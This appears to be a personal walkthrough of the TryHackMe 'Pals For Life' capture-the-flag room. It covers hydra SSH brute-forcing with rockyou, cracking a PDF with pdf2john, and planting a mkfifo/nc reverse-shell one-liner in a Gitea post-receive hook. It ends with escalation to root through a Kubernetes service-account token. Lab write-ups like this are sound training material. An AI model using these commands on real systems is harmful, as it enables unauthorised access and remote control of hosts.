Pals For Life THM Walkthrough
Target IP : 10.10.145.55
scanning the IP
nmap 10.10.145.55 -p- — min-rate 1000 -vv -sCV
This might fill UP your screen with a very big output. But it will open up a lot of attacking vectors for you.
let’s look at the open ports :
I started bruteforcing the ssh services just in case if they work, there is a very slight chance but i like to try every entrance i could get.
hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 10.10.145.55 ssh 31112
hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 10.10.145.55 ssh 22
After a little enumeration i opened port 31111, i guess this is the web tool which is mention in the hint of flag1.
after further exploration in the site i came across a user named leeroy which can be a potential ssh user on the device. whenever you come across a web application, i would recommend spend some time on it understand how it’s working explore every possible thing u can do. It will greatly help you to find if there is something you can use to your advantage.
i tried adding new repositories in Gittea but it didn’t work as i wanted so let’s move on to different ports.
while adding repository i stumbled upon “team.thm”
so lets add that to the /etc/hosts.
Okay now as we know port 30180 is running nginx. So, let’s try gobuster on that and see if we can find any directory.
It did took some time, but i solved my cube in between.
there was nothing much on the webpage so i thought of checking the page source here and i found uninteresting_file.pdf.
which seemed like a base64 code, so i passed it through cyberchef. and copied the content in a created file, named uninterested_file.pdf on my system.
after that i tried to run pdf2john.pl but it kept showing me error, i tried to resolve it but then i copied the code of pdf2john.py and it ran fine in first time only.
link to pdf2john.py
unlocking the pdf with this password we find a new password in the pdf which looks like the password for the user we found earlier.
Now looking the repository we come across a already made webhook, which by updating we can see the secret flag.
Let’s move on with the room and put rev shell code in post Git Hook.
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacking ip> <port>>/tmp/f
now we have to make a push in the repo, as i tried to do from my registered id but it didn’t work so let’s do that here.
git clone http://team.thm:31111/leeroy/jenkins.git
git add web_head
git commit -m “webby_007”
git push origin master
While u use these codes have a nc listener running in the background.
After a little exploration we found the 2nd flag.
In the hint of Flag 3 we have kubectl. With this info i knew i had to find kubernetes so i tried using the find command.
i found how to exploit kubernetes, luckily i found this medium blog.
take the token and save it as token.txt on attacking machine.
tried decoding it to see if i can get something.
we have service account here.
use basic kubectl command to enumerate and see if you can find anything.
i recommend Insekube room on tryhackme to understand this step clearly.
Now to get the root flag, we will search the node and see if we can find any image. Once we have the image we can make a host.yaml file and put our code to give us a bash shell. and then configure it and run it to get the final root shell.
This porcess was confusing for me, i had to take a little help on this one.
And that’s how you have the final ROOT of the medium difficulty ROOM.
HAPPY HACKING 🥳🥳
LINK TREE: https://linktr.ee/RishabhRai